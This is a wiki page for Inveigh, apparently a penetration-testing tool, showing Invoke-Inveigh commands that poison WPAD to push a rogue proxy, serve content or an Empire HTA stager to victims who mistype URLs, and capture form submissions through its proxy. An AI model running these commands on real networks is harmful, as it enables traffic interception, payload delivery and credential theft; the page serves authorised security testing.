Skip to content
Kevin Robertson edited this page Apr 5, 2017 · 2 revisions

Set Proxy Configuration Through WPAD

Inveigh can be configured to deliver wpad.dat files intended to configure an external proxy (not Inveigh) within a target’s web browser. Once the proxy has been configured, it can be leveraged for man-in-the-middle attacks using tactics not covered in this wiki.

  • Relevant Parameter
    WPADDirectHosts
    WPADIP
    WPADPort
    WPADResponse

  • Example
    Invoke-Inveigh -ConsoleOutput Y -WPADIP 192.168.1.100 -WPADPort 8080 -WPADDirectHosts google.com

Inveigh delivering a wpad.dat file containing proxy server details

Mistyped URLs

In the event that a target mistypes a URL leaving off the top-level domain (e.g., http://redditcom, https://reddit), the name resolution should fall down to LLMNR or NBNS. The result should be that the browser connects directly to Inveigh's HTTP/HTTPS listener. Inveigh can be set to deliver specific content for this scenario. This can include text or code (e.g., HTML, HTA) from the command line, or files stored on the hard drive.

  • Example
    Invoke-Inveigh -ConsoleOutput Y -HTTPResponse "<html><head><meta http-equiv='refresh' content='0; url=https://www.youtube.com/watch?v=ys5SlF089nM'></head></html>"

  • Relevant Parameters
    HTTPContentType
    HTTPDefaultEXE
    HTTPDefaultFile
    HTTPDir
    HTTPResponse

Inveigh set to deliver an Empire 2.0 HTA stager

Internet Explorer displaying the HTA popup box after a mistyped URL

Inveigh's Proxy

Usually, the proxy authentication capture will reset the TCP connection right after Inveigh performs a successful capture. This will trigger the WPAD failover and put the browser in a state to request websites directly. When set to deliver content to a browser, Inveigh will send a single response to a web browser after a proxy authentication capture and then reset the connection. If a browser is configured to request an HTTP (not HTTPS) URL upon launch, Inveigh’s proxy should be able to load content into the browser at launch.

Invoke-Inveigh -ConsoleOutput Y -Proxy -HTTPResponse "hello"

  • Relevant Parameters
    HTTPContentType
    HTTPDefaultEXE
    HTTPDefaultFile
    HTTPDir
    HTTPResponse
    Proxy

Inveigh set to deliver a simple form through the proxy

Chrome displaying the simple form

Using Get-Inveigh to retrieve the POST request submitted through the form